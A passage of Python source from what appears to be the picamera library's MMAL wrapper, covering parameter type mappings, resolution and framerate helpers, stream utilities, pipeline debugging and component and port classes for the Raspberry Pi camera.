mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_OUTPUT_SHIFT: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
# mmal.MMAL_PARAMETER_RESIZE_PARAMS: mmal.MMAL_PARAMETER_RESIZE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
}
class PiCameraFraction(Fraction):
"""
Extends :class:`~fractions.Fraction` to act as a (numerator, denominator)
tuple when required.
"""
def __len__(self):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
return 2
def __getitem__(self, index):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
if index == 0:
return self.numerator
elif index == 1:
return self.denominator
else:
raise IndexError('invalid index %d' % index)
def __contains__(self, value):
return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
"""
A :func:`~collections.namedtuple` derivative which represents a resolution
with a :attr:`width` and :attr:`height`.
.. attribute:: width
The width of the resolution in pixels
.. attribute:: height
The height of the resolution in pixels
.. versionadded:: 1.11
"""
__slots__ = () # workaround python issue #24931
def pad(self, width=32, height=16):
"""
Returns the resolution padded up to the nearest multiple of *width*
and *height* which default to 32 and 16 respectively (the camera's
native block size for most operations). For example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).pad()
PiResolution(width=1920, height=1088)
            >>> PiResolution(100, 100).pad()
PiResolution(width=128, height=112)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=112, height=112)
"""
return PiResolution(
width=((self.width + (width - 1)) // width) * width,
height=((self.height + (height - 1)) // height) * height,
)
def transpose(self):
"""
Returns the resolution with the width and height transposed. For
example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).transpose()
PiResolution(width=1080, height=1920)
"""
return PiResolution(self.height, self.width)
def __str__(self):
return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the low and high limits of a range of framerates. It is recommended that
you access the information stored by this class by attribute rather than
position (for example: ``camera.framerate_range.low`` rather than
``camera.framerate_range[0]``).
.. attribute:: low
The lowest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. attribute:: high
The highest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. versionadded:: 1.13
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, low, high):
return super(PiFramerateRange, cls).__new__(cls, to_fraction(low),
to_fraction(high))
def __str__(self):
return '%s..%s' % (self.low, self.high)
class PiSensorMode(namedtuple('PiSensorMode', ('resolution', 'framerates',
'video', 'still', 'full_fov'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the attributes describing a camera sensor mode.
.. attribute:: resolution
A :class:`PiResolution` specifying the size of frames output by the
camera in this mode.
.. attribute:: framerates
A :class:`PiFramerateRange` specifying the minimum and maximum
framerates supported by this sensor mode. Typically the low value is
exclusive and high value inclusive.
.. attribute:: video
A :class:`bool` indicating whether or not the mode is capable of
recording video. Currently this is always ``True``.
.. attribute:: still
A :class:`bool` indicating whether the mode can be used for still
captures (cases where a capture method is called with
``use_video_port`` set to ``False``).
.. attribute:: full_fov
A :class:`bool` indicating whether the full width of the sensor
area is used to capture frames. This can be ``True`` even when the
resolution is less than the camera's maximum resolution due to binning
and skipping. See :ref:`camera_modes` for a diagram of the available
fields of view.
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, resolution, framerates, video=True, still=False,
full_fov=True):
return super(PiSensorMode, cls).__new__(
cls,
resolution
if isinstance(resolution, PiResolution) else
to_resolution(resolution),
framerates
if isinstance(framerates, PiFramerateRange) else
PiFramerateRange(*framerates),
video, still, full_fov)
def open_stream(stream, output=True, buffering=65536):
"""
This is the core of picamera's IO-semantics. It returns a tuple of a
file-like object and a bool indicating whether the stream requires closing
once the caller is finished with it.
* If *stream* is a string, it is opened as a file object (with mode 'wb' if
      *output* is ``True``, and the specified amount of *buffering*). In this
case the function returns ``(stream, True)``.
* If *stream* is a stream with a ``write`` method, it is returned as
``(stream, False)``.
* Otherwise *stream* is assumed to be a writeable buffer and is wrapped
with :class:`BufferIO`. The function returns ``(stream, True)``.
"""
if isinstance(stream, bytes):
stream = stream.decode('ascii')
opened = isinstance(stream, str)
if opened:
stream = io.open(stream, 'wb' if output else 'rb', buffering)
else:
try:
if output:
stream.write
else:
stream.read
except AttributeError:
# Assume the stream is actually a buffer
opened = True
stream = BufferIO(stream)
if output and not stream.writable:
raise IOError('writeable buffer required for output')
return (stream, opened)
def close_stream(stream, opened):
"""
If *opened* is ``True``, then the ``close`` method of *stream* will be
called. Otherwise, the function will attempt to call the ``flush`` method
on *stream* (if one exists). This function essentially takes the output
of :func:`open_stream` and finalizes the result.
"""
if opened:
stream.close()
else:
try:
stream.flush()
except AttributeError:
pass
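# Illustrative sketch (not part of the original module): open_stream() and
# close_stream() are meant to be used as a pair so callers can accept a
# filename, a file-like object, or a writeable buffer interchangeably.
def _example_stream_helpers(output_target):
    stream, opened = open_stream(output_target, output=True)
    try:
        stream.write(b'\xff\xd8\xff')  # e.g. the first bytes of a JPEG
    finally:
        close_stream(stream, opened)   # closes only if open_stream opened it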
def to_resolution(value):
"""
Converts *value* which may be a (width, height) tuple or a string
containing a representation of a resolution (e.g. "1024x768" or "1080p") to
a (width, height) tuple.
"""
if isinstance(value, bytes):
value = value.decode('utf-8')
if isinstance(value, str):
try:
# A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
# Feel free to suggest additions
w, h = {
'VGA': (640, 480),
'SVGA': (800, 600),
'XGA': (1024, 768),
'SXGA': (1280, 1024),
'UXGA': (1600, 1200),
'HD': (1280, 720),
'FHD': (1920, 1080),
'1080P': (1920, 1080),
'720P': (1280, 720),
}[value.strip().upper()]
except KeyError:
w, h = (int(i.strip()) for i in value.upper().split('X', 1))
else:
try:
w, h = value
except (TypeError, ValueError):
raise PiCameraValueError("Invalid resolution tuple: %r" % value)
return PiResolution(w, h)
def to_fraction(value, den_limit=65536):
"""
Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
(numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
the denominator to the range 0 < n <= *den_limit* (which defaults to
65536).
"""
try:
# int, long, or fraction
n, d = value.numerator, value.denominator
except AttributeError:
try:
# float
n, d = value.as_integer_ratio()
except AttributeError:
try:
n, d = value.num, value.den
except AttributeError:
try:
# tuple
n, d = value
warnings.warn(
PiCameraDeprecated(
"Setting framerate or gains as a tuple is "
"deprecated; please use one of Python's many "
"numeric classes like int, float, Decimal, or "
"Fraction instead"))
except (TypeError, ValueError):
# try and convert anything else to a Fraction directly
value = Fraction(value)
n, d = value.numerator, value.denominator
# Ensure denominator is reasonable
if d == 0:
raise PiCameraValueError("Denominator cannot be 0")
elif d > den_limit:
return Fraction(n, d).limit_denominator(den_limit)
else:
return Fraction(n, d)
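# Minimal sketch (not part of the original module): to_fraction() accepts ints,
# floats, Fractions, MMAL rationals, and (deprecated) two-element tuples, and
# caps the denominator so the value fits an MMAL_RATIONAL_T.
def _example_to_fraction_usage():
    assert to_fraction(30) == Fraction(30, 1)
    assert to_fraction(Fraction(30000, 1001)) == Fraction(30000, 1001)
    assert to_fraction(0.5) == Fraction(1, 2)
    # very precise floats are limited to a denominator of at most 65536
    assert to_fraction(1 / 3).denominator <= 65536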
def to_rational(value):
"""
Converts *value* (which can be anything accepted by :func:`to_fraction`) to
an MMAL_RATIONAL_T structure.
"""
value = to_fraction(value)
return mmal.MMAL_RATIONAL_T(value.numerator, value.denominator)
def buffer_bytes(buf):
"""
Given an object which implements the :ref:`buffer protocol
<bufferobjects>`, this function returns the size of the object in bytes.
The object can be multi-dimensional or include items larger than byte-size.
"""
if not isinstance(buf, memoryview):
buf = memoryview(buf)
return buf.itemsize * reduce(mul, buf.shape)
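# Illustrative sketch (not part of the original module): buffer_bytes() reports
# the total size in bytes of any buffer-protocol object, including those whose
# items are larger than a single byte.
def _example_buffer_bytes_usage():
    import array
    assert buffer_bytes(b'1234') == 4
    ints = array.array('I', range(10))
    assert buffer_bytes(ints) == 10 * ints.itemsize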
def debug_pipeline(port):
"""
Given an :class:`MMALVideoPort` *port*, this traces all objects in the
pipeline feeding it (including components and connections) and yields each
object in turn. Hence the generator typically yields something like:
* :class:`MMALVideoPort` (the specified output port)
* :class:`MMALEncoder` (the encoder which owns the output port)
* :class:`MMALVideoPort` (the encoder's input port)
* :class:`MMALConnection` (the connection between the splitter and encoder)
* :class:`MMALVideoPort` (the splitter's output port)
* :class:`MMALSplitter` (the splitter on the camera's video port)
* :class:`MMALVideoPort` (the splitter's input port)
* :class:`MMALConnection` (the connection between the splitter and camera)
* :class:`MMALVideoPort` (the camera's video port)
* :class:`MMALCamera` (the camera component)
"""
def find_port(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALControlPort):
if ct.addressof(obj._port[0]) == addr:
return obj
raise IndexError('unable to locate port with address %x' % addr)
def find_component(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALBaseComponent) and obj._component is not None:
if ct.addressof(obj._component[0]) == addr:
return obj
raise IndexError('unable to locate component with address %x' % addr)
assert isinstance(port, (MMALControlPort, MMALPythonPort))
while True:
if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
yield port
if isinstance(port, MMALPythonPort):
comp = port._owner()
else:
comp = find_component(ct.addressof(port._port[0].component[0]))
yield comp
if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
break
if comp.connection is None:
break
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._target
else:
port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
yield port
yield comp.connection
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._source
else:
port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
"""
Prints a human readable representation of the pipeline feeding the
specified :class:`MMALVideoPort` *port*.
"""
rows = [[], [], [], [], [], []]
under_comp = False
for obj in reversed(list(debug_pipeline(port))):
if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
rows[0].append(obj.name)
under_comp = True
elif isinstance(obj, MMALVideoPort):
rows[0].append('[%d]' % obj._port[0].index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
if under_comp:
rows[4].append('frame')
rows[4].append('%dx%d@%sfps' % (
obj._port[0].format[0].es[0].video.width,
obj._port[0].format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
under_comp = False
rows[5].append(mmal.FOURCC_str(obj._port[0].format[0].es[0].video.color_space))
elif isinstance(obj, MMALPythonPort):
rows[0].append('[%d]' % obj._index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._format[0].es[0].video.width,
obj._format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
rows[5].append('???')
elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
rows[0].append('')
rows[1].append('')
rows[2].append('-->')
rows[3].append('')
rows[4].append('')
rows[5].append('')
if under_comp:
rows[1].append('encoding')
rows[2].append('buf')
rows[3].append('bitrate')
rows[4].append('frame')
rows[5].append('colorspc')
cols = list(zip(*rows))
max_lens = [max(len(s) for s in col) + 2 for col in cols]
rows = [
''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
for row in rows
]
for row in rows:
print(row)
class MMALObject(object):
"""
Represents an object wrapper around an MMAL object (component, port,
connection, etc). This base class maintains a registry of all MMAL objects
currently alive (via weakrefs) which permits object lookup by name and
listing all used MMAL objects.
"""
__slots__ = ('__weakref__',)
REGISTRY = weakref.WeakSet()
def __init__(self):
super(MMALObject, self).__init__()
MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
"""
Represents a generic MMAL component. Class attributes are read to determine
the component type, and the OPAQUE sub-formats of each connectable port.
"""
__slots__ = ('_component', '_control', '_inputs', '_outputs')
component_type = b'none'
opaque_input_subformats = ()
opaque_output_subformats = ()
def __init__(self):
super(MMALBaseComponent, self).__init__()
self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
mmal_check(
mmal.mmal_component_create(self.component_type, self._component),
prefix="Failed to create MMAL component %s" % self.component_type)
if self._component[0].input_num != len(self.opaque_input_subformats):
raise PiCameraRuntimeError(
'Expected %d inputs but found %d on component %s' % (
len(self.opaque_input_subformats),
self._component[0].input_num,
self.component_type))
if self._component[0].output_num != len(self.opaque_output_subformats):
raise PiCameraRuntimeError(
'Expected %d outputs but found %d on component %s' % (
len(self.opaque_output_subformats),
self._component[0].output_num,
self.component_type))
self._control = MMALControlPort(self._component[0].control)
port_class = {
mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
}
self._inputs = tuple(
port_class[self._component[0].input[n][0].format[0].type](
self._component[0].input[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_input_subformats))
self._outputs = tuple(
port_class[self._component[0].output[n][0].format[0].type](
self._component[0].output[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_output_subformats))
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
if self._component is not None:
# ensure we free any pools associated with input/output ports
for output in self.outputs:
output.disable()
for input in self.inputs:
input.disable()
mmal.mmal_component_destroy(self._component)
self._component = None
self._inputs = ()
self._outputs = ()
self._control = None
@property
def name(self):
return self._component[0].name.decode('ascii')
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return self._control
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return bool(self._component[0].is_enabled)
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
mmal_check(
mmal.mmal_component_enable(self._component),
prefix="Failed to enable component")
def disable(self):
"""
Disables the component.
"""
mmal_check(
mmal.mmal_component_disable(self._component),
prefix="Failed to disable component")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __repr__(self):
if self._component is not None:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
"""
Represents an MMAL port with properties to configure the port's parameters.
"""
__slots__ = ('_port', '_params', '_wrapper')
def __init__(self, port):
super(MMALControlPort, self).__init__()
self._port = port
self._params = MMALPortParams(port)
self._wrapper = None
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._port[0].index
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return bool(self._port[0].is_enabled)
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
callback(self, buf)
finally:
buf.release()
if callback:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
else:
self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
def disable(self):
"""
Disable the port.
"""
        # NOTE: This test only exists to avoid spamming the console; when
        # disabling an already disabled port, MMAL dumps errors to stderr. If
        # this test weren't here, closing a camera would result in half a dozen
        # lines of ignored errors.
if self.enabled:
try:
mmal_check(
mmal.mmal_port_disable(self._port),
prefix="Unable to disable port %s" % self.name)
except PiCameraMMALError as e:
# Ignore the error if we're disabling an already disabled port
if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
raise e
self._wrapper = None
@property
def name(self):
result = self._port[0].name.decode('ascii')
if result.endswith(')'):
try:
# strip (format) from port names as it doesn't really belong
# there (it doesn't identify the port in any way) and makes
# matching some of the correctional cases a pain
return result[:result.rindex('(')]
except ValueError:
return result
else:
return result
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._port[0].type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return self._port[0].capabilities
@property
def params(self):
"""
The configurable parameters for the port. This is presented as a
mutable mapping of parameter numbers to values, implemented by the
:class:`MMALPortParams` class.
"""
return self._params
def __repr__(self):
if self._port is not None:
return '<MMALControlPort "%s">' % self.name
else:
return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
